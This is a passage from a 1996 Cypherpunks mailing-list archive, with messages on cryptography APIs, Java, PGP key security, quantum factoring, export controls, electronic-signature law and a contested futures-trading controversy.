a chance to look at the actual work. Check out ICE. Those familiar with
cyberpunk fiction will no doubt find the ancronym as humorous/ironic as I do
<grin>:

The International Cryptography Experiment (ICE) calls for a series of
experiments to promote the international use of cryptography in common
computer software applications (i.e., word processors, spreadsheets,
electronic mail systems) in a manner that honors individual national
controls on the import, export, and use of cryptography. The general
approach being advocated by numerous organizations in several countries is
the use of a Cryptographic Application Programming Interface (CAPI) to
separate the actual performance of the cryptographic functions from the
software applications that call for encryption of specific messages or
files. ICE is an informally structured program to coordinate the many
efforts underway in the U.S and several other countries to advance the
general understanding of CAPIs and their use to promote international
cryptography. It is intended that practical standards derived from actual
use will evolve from these experiments in the spirit by which Internet
standards evolve. 

http://www.tis.com/crypto/ice.html .
_______________________
Regards,            Real generosity toward the future lies in giving 
                    all to the present. - Albert Camus
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Thu, 6 Jun 1996 17:07:27 +0800
To: cypherpunks@toad.com
Subject: Re: Java
In-Reply-To: <v02140b02addb7880650e@[17.202.12.102]>
Message-ID: <v03007215addbb3b383e2@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 -0700 5.6.96, Martin Minow wrote:

> Tim May writes
>
>> Java as a language and as a platform-independent implementation is an
>> achievement.
>
>It's also not owned by the evil Redmond empire

I'm not so sure. It seems to me that Sun's abrogation of responsibility
for the x86 reference implementation to Microsoft also handed over the
de facto ownership of Java until ANSI/ISO get their hands on it, by
which time it may be too late. (It also raises the question whether a
browser with a built-in Java VM, such as Netscape's, will use its own
VM or the Java VM present in the OS when a choice is available.)

There are an awful lot of x86 boxes out there and they carry a lot of
common-denominational weight. There's also little to stop Microsoft
from extending their Java implementation while remaining compliant with
the basic Java spec. The HTML wars seem to have quieted down
considerably in recent months, but I still recall the vigorous
extension-tag oneupmanship that went on between Microsoft and Netscape;
I see no reason that this couldn't also happen with Java.

ObCrypto: If Microsoft does wind up setting the de facto standard for
Java by virtue of owning the x86/Win32 VM, can it successfully force
the use of its particular APIs in Java applets by sheer weight of
installed base?

________________________________________________________________________
Stephan Somogyi                Mr Gyroscope                Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 6 Jun 1996 16:10:42 +0800
To: cypherpunks@toad.com
Subject: Re: Senator Exon & me
In-Reply-To: <199606051212.IAA11953@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.93.960605153622.186B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 5 Jun 1996, Perry E. Metzger wrote:

> 
> Are you sure that you weren't just getting mail from the Senator Exon
> remailer? The real Senator Exon doesn't use email.

Blake Wehlage wrote:

| #1 If you really wanted to show just had balls (I hate to use the phrase but
| I can't think of anything better) you wouldn't hide behide remailers.
                                                 ^^^^^^^^^^^^^^^^^^^^^

I am sure he realizes Sen. Exon is a remailer given the above quote.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMbXij7Zc+sv5siulAQFZ2gP+OkakYJcDjzK/G2bWEUdIYJAedHh0dbAZ
lwXCjGTLlJmC5lspgZ0qJLRK+PXbp2pcy5Hs1uZQ+N9QMwsbqXPuUXrm0G6QVt6H
8pYB8j7WJwYoJz62rY+eRmiPZR1pth4W8ukeKnRHRYLF2oECHaS8HRNYu8amulBY
BiM3WPmyibs=
=fIxB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 6 Jun 1996 04:44:50 +0800
To: cypherpunks@toad.com
Subject: [META-NOISE]  I'm sick of hearing about policy
Message-ID: <199606051341.PAA12666@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I wish there were some keyword or set of filter-rules so that 
I could eliminate all discussion of government, politics
(including the assassinine kind), policy, export, GAK, TLA's and
cetera from my cpunks inbox.


I really could care less at this point about any of the opinions
that any of the cpunks contributors have on any of those
subjects.  It all amounts to some combination of a) whining and
b) preaching to the choir.


I should just hurry up and implement my "c2punks" NoCeM-style
ratings.  In my spare time.

Hahaha!  "My spare time"!  That was a good one...


Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMbWOmUjbHy8sKZitAQH/eAL+IqOxP6wbrrARWQI/vZEutcx62oRjF2Vf
iznMuOX+xcLrkN1cZWExHffpHGRBBBKmnZqguod0pERkLkFqDe0NtOn/80L2Du/v
sPMkrvGad4pcV3BDy93iCxHB3oxWCORF
=tPVn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey A Nimmo <janimmo@ionet.net>
Date: Thu, 6 Jun 1996 16:28:41 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.SUN.3.91.960605162533.7279C-100000@polaris>
Message-ID: <Pine.SOL.3.91.960605153106.26199C-100000@ion1.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 5 Jun 1996, Black Unicorn wrote:

[snip]

> > I've heard of this kind of thing before. Individuals have already been 
> > sent to jail for doing this, as well as doing and 
> > distributing kiddie porn drawings. 
> 
> I know indirectly of two state supreme courts that have overturned such 
> convictions.

I would put it to you that being branded a pedophile and kiddie-porn 
operator can have worse implications than jail. For instance, I believe 
that even without a conviction, restraining orders can be placed which 
would prevent you from coming within a certain number of feet of 
children. If it were publically known you would almost certainly lose 
your job. I also imagine it would be hell on your marriage.

All this can result from an arrest, not necessarily a conviction.

Besides, I wouldn't count on the courts to uphold our rights. The Supreme 
Court just upheld civil forfeiture, allowing the cops to sieze your 
property without due (or any as far as I'm concerned) process of law.

> > I suspect that since it's already illegal on the state level, that 
> > Congress is looking into making it a federal crime to distribute them 
> > over state lines via the Internet.
> 
> See above.
> As to federal crime, I believe so.
> 
> > > I'd like to see exactly how they word the proposed prohibitons.  What 
> > > constitutes "child" when the face painted on is pure artistry?  Will we 
> > > see a simple and strict prohibition over modifiying sexually explicit 
> > > pictures to make them appear to be of younger models (whatever their 
> > > apparent age may be)?  Will we see a subjective test as to what is "child 
> > > looking" enough?
> > 
> > It only has to give the impression of being under the age of consent in 
> > order to be illegal. No real models have to be involved.
> 
> Ok, what is "the impression of being under the age of consent" ?

I believe that like all porn, it's a reasonability issue. If a 
"reasonable" person would believe that the person depicted in the drawing 
or morph to be underage, that it's illegal. I'm not sure, but I'll bet 
Sternlight would have an opinion. Anyone care (dare) to ask?

> 
> > > Silliness.  All silliness.
> > 
> > That's debatable. However, in this politically correct environment, I 
> > wouldn't even give the impression of siding with the pedophiles if I were 
> > you.
> 
> That's what nyms are for.

That's a good point. Anonymity makes it possible to ask questions that 
would be too embarressing or damaging to ask otherwise. It makes me 
wonder what would have happened if the Cypherpunks had been around in the 
McCarthy era.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bodo_Moeller@public.uni-hamburg.de (Bodo Moeller)
Date: Thu, 6 Jun 1996 16:04:25 +0800
To: cypherpunks@toad.com
Subject: Re: Fate of Ecash if RSA is cracked?
Message-ID: <m0uRIwy-0000AJC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com>:
>Igor Chudov @ home:

>> Actually factoring is not exponential even now.
[... est.:]
>> N ~= exp(((1.923+O(1)) * (ln n)^(1/3) * ln ln n)^(2/3))

> The distinction between that and exponential is rather difficult for
> most ordinary people to see, and in any case subexponential and
> exponential are "practically the same" for purposes of this
> discussion.

When discussing the estimated time needed for factoring integers, it
is usually assumed that an "algorithm" is something that is
deterministic or probabilistic.  Quantum computing should also be
mentioned.  Efficient algorithms for logarithms (the Diffie-Hellmann-
problem) and factoring (the RSA-problem) on a quantum computer were
found by Peter Shor [1].

Of course, no quantum computing device that you could run those
"programs" on does exist. But as Gilles Brassard puts it, "In my
opinion, the theoretical notion of feasible computation should be
modelled on our understanding of the physical world, not on our
technological abilities. After all, the classical Turing machine
itself is an idealization that cannot be built in practice even not
taking account of the unbounded tape: any real implmentation of a
Turing machine would have nonzero probability of making a mistake.
Does this discredit the model? I think not." [2]

An other article by Brassard might still be availabe at
<URL:http://www.rsa.com/rsalabs/cryptobytes/spring95/brassard.htm>.
There, he writes quite optimistically: "I like to think that I shall
see a special-purpose quantum factorization device in my lifetime."


[1] Peter W. Shor, Algorithms for Quantum Computation: Discrete
    Logarithms and Factoring (in: Proceedings of the 35th Annual IEEE
    Symposium on Foundations of Computer Science, 1994, pp. 116-134)

[2] Gilles Brassard, A Quantum Jump in Computer Science (in: Computer
    Science Today (Springer-Verlag LNCS 1000), 1995, pp. 1-14)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Thu, 6 Jun 1996 10:21:11 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.SOL.3.91.960605065515.19215C-100000@ion1.ionet.net>
Message-ID: <19960605155715.3302.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Bruce M. writes:
 > On Wed, 5 Jun 1996, Jeffrey A Nimmo wrote:
 > 
 > > That's debatable. However, in this politically correct environment, I 
 > > wouldn't even give the impression of siding with the pedophiles if I were 
 > > you.
 > 
 >     Sometimes you have to decide whether to be politically correct or right.


Encryption is about free speech.  It's NEVER politically correct to
defend free speech.  Free speech is about offensive speech because
that's the only kind that people try to ban.


If you can't stand the heat, get out of the enkripchen.


-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 6 Jun 1996 19:08:40 +0800
To: cypherpunks@toad.com
Subject: Re: Security of PGP if Secret Key Available?
In-Reply-To: <199606051033.MAA14983@internal-mail.systemics.com>
Message-ID: <Pine.LNX.3.93.960605161013.186C-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 5 Jun 1996, Gary Howland wrote:

> On Jun 3,  2:36, "Robert A. Hayden" wrote:
> > However, I got to wondering about the security of PGP assuming somebody
> > trying to read my PGPed stuff has my 1024-bit secret key.  ie, if I have
> > it on my personal computer, and somebody gets my secret key, how much
> > less robust has PGP just become, and what are appropriate and reasonable
> > steps to take to protect this weakness?
> 
> If the secret key is available then an attacker knows the length
> of p & q.  Admittedly this will not usually help matters much,
> but I still feel that the lengths of p and q should be encrypted
> with the passphrase - perhaps in PGP3.0? (Derek?)

I don't see how knowing the exact lengths of p and q will help matters much.
I don't think it will speed up the factoring time, and it won't make brute-
forcing the passphrase any easier.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMbXp97Zc+sv5siulAQFTBAQAjcfF5jh29RhTPokzfHbTEU+5aspywOPZ
C3V1Lvucf6rYPH3J8oo8o8qo8iUjWIHR3B6Xh/DllslfDmO+WnOceaz888gErnGz
X30prZ3Q6pue0WbrCk5S6++OMXux0+zzEcB5z5jcZb3wNLie8Qr2nnwyvM3ha1Gj
bx96KawqVEI=
=VSDw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 6 Jun 1996 16:27:20 +0800
To: paul@ljl.COM (Paul Robichaux)
Subject: Re: Markoff in NYT on NTT/RSA chip
In-Reply-To: <v03007101adda1bc74f88@[206.151.234.118]>
Message-ID: <199606052013.QAA04983@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> 
> 3. Once you import an ITAR item, its export becomes controlled. Importing
> the NTT chipset for use, say, in a Motorola cell switch (made in IL) would
> seem to be problematic. Buying chips in Japan for shipment to Moto's phone
> factories in Singapore and Malaysia, however, would appear to be OK. 

So Motorboatarola puts chips in the domestic MTSO's. 
For the international ones, they leave the chips out.

If the local service agency in Freedonia wants to buy the chips
from Japan & install them themselves, what can IL say?



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 6 Jun 1996 07:49:32 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: FOR WHOM THE BELL TOLLS
In-Reply-To: <2.2.32.19960604193049.0072daf0@popmail.crl.com>
Message-ID: <199606051413.QAA14317@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

"Sandy" wrote:
>
> My question for member of this list is:  When Bell finally
> goes too far and they arrest or shoot him, how can we best
> capitalize on his martyrdom?  Or in a more negative light,
> what damage control will we need to do in that case?


Hm.  I think the best we could hope for is along the lines of 
"The suspect subscribed to the 'Cypherpunks' discussion group on 
the Internet, but his violent views were rejected by the members
of the group."


It is important that the reporter manages to _not_ use the word
"member" to indicate that Bell is a "member" of Cypherpunks.


I think that conversing with Bell, or publically replying to him
at all, even to insult him, makes him more of a "member" and 
makes his pet topic more a part of cypherpunks, both in appearance
and in substance.  So don't do it.  That means you, too,
Black Unicorn.  At _least_ you can take it to private e-mail in
order to prevent the reporters from getting the wrong idea, and
in order to spare the rest of us the tedium of deleting the
messages.


This is assuming that the statement "his violent views were
rejected by the members of the group" is actually true!  If 
there _is_ anyone else here who shares Bell's evil enthusiasms, 
I strongly encourage you to begin a new list dedicated to that 
topic.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMbWV+kjbHy8sKZitAQG9+QMAmOD17gObNoIYWwstKVwqqzaIE/D3m0YE
E3vkrMSqtXYOqg3va2+FWhaawWvvVJTLPKWdYn/kQN+jaaJo3tmPXmyAFKlLVXs5
qZUWxw+nu4vct8TIw+gAxLsWP5ZZvuGe
=QzOk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Thu, 6 Jun 1996 16:10:46 +0800
To: cypherpunks@toad.com
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <199606051821.OAA12450@jekyll.piermont.com>
Message-ID: <9606052018.AA03374@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>Phill, quit while you are ahead. It is my opinion, as a person highly
>familiar with the markets in question, that Hillary Clinton's profits
>were impossible to achieve by any means other than fraud, and that no
>honest broker would have allowed her to hold positions in which she
>was so far out of mandatory margin requirements and a trivial move
>would have wiped out her entire net worth and more.  I do not know of
>a single professional in the industry who disagrees with me.

Crap Perry, I discussed the affair with a top investment manager
at Barclays Bank Suisse. He saw no problem whatsoever in the deals.
Neither did my friend who trades oil futures for Rappaport. If you 
want to play the "who knows who in banking" game remember that the
Oxford Union and the Swiss National Croquet team are probably better
places to meet banking types than the Palo Alto Au Bon Pain.


>Futures, Mr. Baker.

Its Dr., Mr Metzger


Before you get all steamed up and bothered consider that you are 
behaving in typical USEnet flamefest fashion. Are you going to claim
that the underlying mechanism for options is any different than for 
futures? The point was that she was _selling_ and not _buying_. Thats
a fixed profit bet with an unlimited downside.

>The most astounding part of the trading pattern was that Hillary
>Clinton did not "let it ride" and earn the money off of repeated
>increases in the value of a single investment

Of course, a person _selling_ futures is going to take the profits out
each time. The profits are made against the net worth of the person
concerned. Its an _underwriting_ business Mr Metzger. $100,000 is not a 
substantial increase in Hillary's net worth so she _can't_ underwrite
more business. 

>There is an obvious trick by which this can be achieved. The broker
>writes two tickets -- one to buy, one to sell. One ticket always loses
>exactly what the other gains. The winning ticket is assigned to the
>bribee, the loser to the person doing the bribing. The mechanism
>self-launders the funds.

Oh yes, and how does one cover up the matching ticket? They would
show up on the brokers account. 

If one wishes to bribe a politician a much better way is to give them
a huge advance on their book, or buy some tangible asset at above
market value. I can't see an intelligent broker risking his business 
when there are easier mechanisms available.

>Margin requirements are set by the exchanges and the CFTC, not by the
>broker in most cases. They are required by law -- not under broker
>discretion.

Forgive me if I am wrong but are CFTC margin requirements not 
requirements placed on brokers as opposed to requirements brokers
must impose on customers? That at any rate is my understanding
of the situation from Galbraith.
 

Given the four years of dirt digging over Whitewater its a safe bet
that none of the actions were illegal as Mr Metzger claims. If they
were it would demonstrate more than incompetence on the part of
D'Amato et al. After four years they have a convicted fraudster and 
self confesed pejurer as their only link to the Whitehouse. If there
was such obvious criminality in those dealings D'Amato would have
been all over them.


ObCrypto: Perry is only able to make allegations because the
financial markets are to a degree open. If anoymous cash takes
off and anonymous derivatives follow won't it make it easier to
conceal the type of dealings Perry alledges?


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 6 Jun 1996 16:06:25 +0800
To: ichudov@algebra.com
Subject: Re: Electronic Signature Act Of 1996
In-Reply-To: <199606050323.WAA09499@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.960605162011.7279A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 4 Jun 1996 ichudov@algebra.com wrote:

> Sandy Sandfort wrote:
> > C'punks,
> > 
> > At 11:11 AM 6/4/96 -0400, Perry E. Metzger wrote:
> > 
> > >...I get the impression that under the common law, an ink 
> > >signature is merely a demonstration that a party assented 
> > >to a contract, and except for certain contracts (which 
> > >usually require witnesses etc.) there is no requirement in 
> > >the law that a contract even be on paper...
> > 
> > The "Statute of Frauds" lists the exceptions and they cover
> > most important contracts.  I seem to recall that contracts
> > over a given amount or for interests in real property for 
> > periods of a year or more are covered.  I'm sure someone 
> > with current access to legal research resources will post
> > a better explanation.
> 
> [I AM NOT A LAWYER]
> 
> The following contracts are required to be in writing, in most states: 
> 
> 
> 1. A contract of an executor or administrator to answer
> for a duty of the decedent (the executor-administrator
> provision).
> 
> 2. A contract to answer for debt or default of another (the suretyship
> provision).
> 
> 3. A contract made upon consideration of marriage (the marriage provision).
> 
> 4. A contract for sale of goods worth more than $500 (the sales provision).
> 
> 5. A contract for sale of an interest in land (the land provision).
> 
> 6. A contract not preformable within a year (the one-year provision).

Exceptions and loopholes are SO numerous so as to make this list less 
than worthless.

The only straightforward rules are with respect to UCC sale of goods 
contracts.

> 	- Igor.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 6 Jun 1996 15:25:30 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: Electronic Signature Act Of 1996
In-Reply-To: <2.2.16.19960605091100.1cd70da2@mail.io.com>
Message-ID: <Pine.SUN.3.91.960605162420.7279B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Greg Broiles wrote:

> 
> I think more apropos to the discussion of electronic signatures is UCC
> 1-201(39), "'Signed' includes any symbol executed or adopted by a party with
> present intention to authenticate a writing." Comment 39 to 1-201 indicates
> "[a]uthentication may be printed, stamped or written; it may be by initials
> or by thumbprint. It may be on any part of the document and in appropriate
> cases may be found in a billhead or letterhead. No catalog of possible
> authentications can be complete and the court must use common sense and
> commercial experience in passing upon these matters. The question always is
> whether the symbol was executed or adopted by the party with present
> intention to authenticate the writing." And comment 2 to 3-401 (re
> negotiable instruments) indicates that a signature may be "handwritten,
> typed, printed or made in any other manner."

Please remember that the UCC's application is generally restricted to the 
sales of goods or acts between merchants.

> 
> So I don't see why that wouldn't include a PGP signature, a traditional
> ".signature" block, or the typed "/s/ Greg Broiles" used in some
> circumstances. (Of course, the UCC doesn't apply to every transaction, nor
> is it adopted in identical form in every state, blah blah blah.) But it's
> always nice if the legislature is willing to say "This is the right way to
> create an electronic signature" because then we don't have to wonder. 
> (However, a signature and a contract are not the same thing - and you don't
> need to have a contract to have an enforceable obligation. A nonrepudiable
> document still isn't a self-executing one.)

See above.

> --
> Greg Broiles                |"Post-rotational nystagmus was the subject of
> gbroiles@netbox.com         |an in-court demonstration by the People
> http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
>                             |Studdard." People v. Quinn 580 NYS2d 818,825.
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 6 Jun 1996 16:05:11 +0800
To: Jeffrey A Nimmo <janimmo@ionet.net>
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.SOL.3.91.960605065515.19215C-100000@ion1.ionet.net>
Message-ID: <Pine.SUN.3.91.960605162533.7279C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Jeffrey A Nimmo wrote:

> 
> 
> On Tue, 4 Jun 1996, Black Unicorn wrote:
> 
> > 
> > Hearings on the hill over the child pornographer horseman:
> > 
> > "Morphing" seems to be the latest buzzword for putting childrens faces on 
> > the bodies of adult models in sexually explicit poses and seems to have 
> > attracted enough attention to warrant congressional attention.
> > 
> > Interesting that the media is playing this up as a "net" deal.  (As if 
> > somehow it were impossible to do without the all powerful and evil internet.
> 
> I've heard of this kind of thing before. Individuals have already been 
> sent to jail for doing this, as well as doing and 
> distributing kiddie porn drawings. 

I know indirectly of two state supreme courts that have overturned such 
convictions.

> I suspect that since it's already illegal on the state level, that 
> Congress is looking into making it a federal crime to distribute them 
> over state lines via the Internet.

See above.
As to federal crime, I believe so.

> > I'd like to see exactly how they word the proposed prohibitons.  What 
> > constitutes "child" when the face painted on is pure artistry?  Will we 
> > see a simple and strict prohibition over modifiying sexually explicit 
> > pictures to make them appear to be of younger models (whatever their 
> > apparent age may be)?  Will we see a subjective test as to what is "child 
> > looking" enough?
> 
> It only has to give the impression of being under the age of consent in 
> order to be illegal. No real models have to be involved.

Ok, what is "the impression of being under the age of consent" ?

> > Silliness.  All silliness.
> 
> That's debatable. However, in this politically correct environment, I 
> wouldn't even give the impression of siding with the pedophiles if I were 
> you.

That's what nyms are for.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 6 Jun 1996 17:10:56 +0800
To: hallam@etna.ai.mit.edu
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <9606052018.AA03374@Etna.ai.mit.edu>
Message-ID: <199606052043.QAA12656@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@Etna.ai.mit.edu writes:
> If you want to play the "who knows who in banking" game remember
> that the Oxford Union and the Swiss National Croquet team are
> probably better places to meet banking types than the Palo Alto Au
> Bon Pain.

Working for Wall Street investment banks is probably better than both.

I live in New York, not Palo Alto. Guess who I work for. Hint: if I
want to speak to a futures trader, most days I can walk down the hall.

> >The most astounding part of the trading pattern was that Hillary
> >Clinton did not "let it ride" and earn the money off of repeated
> >increases in the value of a single investment
> 
> Of course, a person _selling_ futures is going to take the profits out
> each time.

I don't think you get it.

Its one thing to put up $1000, make $4000, then put up the $5000 and
make $10,000 with it, etc. Thats a situation where you are compounding
your profits -- reinvesting them.

Its another thing to put up $1000, make $4000, withdraw the $4000, put
up $1000, make $4500, withdraw the $4500, etc.

This is not a case of someone making a profit and reinvesting it so
that she got compound returns. This is a case of someone miraculously
turning one in a million trades over and over and over again on the
same tiny stake until she got $100,000. Its almost impossible to turn
$1000 into $100,000 by reinvesting. Its dead impossible the way that
Hillary did it.

Neiderhoffer and Baum list about a dozen criteria for detecting fraud
in securities transactions like this. Hillary Clinton hits every
single one. She was a first time trader. She took gigantic risk. Her
account was full of large scale irregularities like failure to meet
margin requirments. She earned astounding profits. She was in a
position to be bribed. She made her money off leverage in tiny
movements that would be hard to impossible for people to exploit. She
stopped trading just as suddenly as she started in spite of her
miraculous success. You can read Neiderhoffer and Baum's article
yourself if you like.

I will state this for the record: Having examined the evidence, I
would say that even a non-expert who was reasonably informed about how
the futures markets work would have no choice but to conclude that
Hillary Clinton's trading pattern was impossible without some sort of
fraud being committed.

> The profits are made against the net worth of the person
> concerned. Its an _underwriting_ business Mr Metzger. $100,000 is not a 
> substantial increase in Hillary's net worth so she _can't_ underwrite
> more business. 

Huh? What are you talking about?

Futures contracts aren't an "underwriting" in any case. They are very
simple contracts. When you buy a futures contract in, say, feeder
cattle, you are buying delivery of a fixed size number of feeder
cattle on a particular date in the future. When you sell a contract,
you are agreeing to deliver that many cattle. Thanks to margin, of
course, by putting up a fairly small sum of money you can buy control
over a large number of cattle, and not have to actually put up most of
the money.

One major problem with Hillary Clinton's fraudulent trades, however,
was that she was buying enough contracts that a tiny shift in the
price of the cattle downward -- shifts of a size that would be common
in a given day -- would have more than wiped out her families entire
net worth and more. Somehow, though, her broker allowed her to take
such large positions -- without putting up the *legally*required*
margin -- and somehow in lots of trades a statistically ordinary
blip never hit her.

One wonders why someone who's husband had just been elected Governor,
and who had no history of gambling, and had no sudden financial
crisis, would be willing to gamble her family's entire future over and
over again -- unless, of course, it wasn't gambling.

> >There is an obvious trick by which this can be achieved. The broker
> >writes two tickets -- one to buy, one to sell. One ticket always loses
> >exactly what the other gains. The winning ticket is assigned to the
> >bribee, the loser to the person doing the bribing. The mechanism
> >self-launders the funds.
> 
> Oh yes, and how does one cover up the matching ticket? They would
> show up on the brokers account. 

Of course they would. Sadly, however, the broker in question
conveniently lost ALL RECORDS OF TRANSACTIONS THAT TOOK PLACE AT THAT
TIME. Sad, isn't it?

This same broker was censured repeatedly for violating securities
laws, by the way.

Does the word "coverup" mean anything to you?

> If one wishes to bribe a politician a much better way is to give them
> a huge advance on their book, or buy some tangible asset at above
> market value.

Both of those are visible. This is invisible.

> I can't see an intelligent broker risking his business when there
> are easier mechanisms available.

The trick was very common at the time, a fact that all your brilliant
friends you consulted didn't seem to know. Many brokers got snagged,
along with their clients, in pulling this game for all sorts of
reasons -- shifting assets from a taxable account held by a client
into their tax free pension account, for example. The SEC, CFTC and
IRS caught on, and the practice has been largely wiped out. Matched
trades were common, however, in the period we are talking about, and
many brokers did in fact perform them for clients.

> >Margin requirements are set by the exchanges and the CFTC, not by the
> >broker in most cases. They are required by law -- not under broker
> >discretion.
> 
> Forgive me if I am wrong but are CFTC margin requirements not 
> requirements placed on brokers as opposed to requirements brokers
> must impose on customers?

I must confess that I don't know, largely because its irrelevant, even
in this case.

> Given the four years of dirt digging over Whitewater its a safe bet
> that none of the actions were illegal as Mr Metzger claims.

Of course they were. They just can't be proven.

We are not dealing with some idiot like Spiro T. Agnew here. We are
talking about a pair of well educated, very smart and totally
unscrupulous crooks -- Bill and Hillary Clinton. There is no evidence
that you can pin on them in court. However, I'm not a court, and I'm
allowed to judge something to have been impossible to achieve without
hanky panky regardless of whether or not you can prove who the
counterparty is and why the bribe was made.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 6 Jun 1996 16:41:53 +0800
To: perry@piermont.com
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <199606052043.QAA12656@jekyll.piermont.com>
Message-ID: <199606052110.RAA12739@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I realized that there was an ambiguity in my last missive. I'd like to
close that ambiguity.

"Perry E. Metzger" writes:
> > Forgive me if I am wrong but are CFTC margin requirements not 
> > requirements placed on brokers as opposed to requirements brokers
> > must impose on customers?
> 
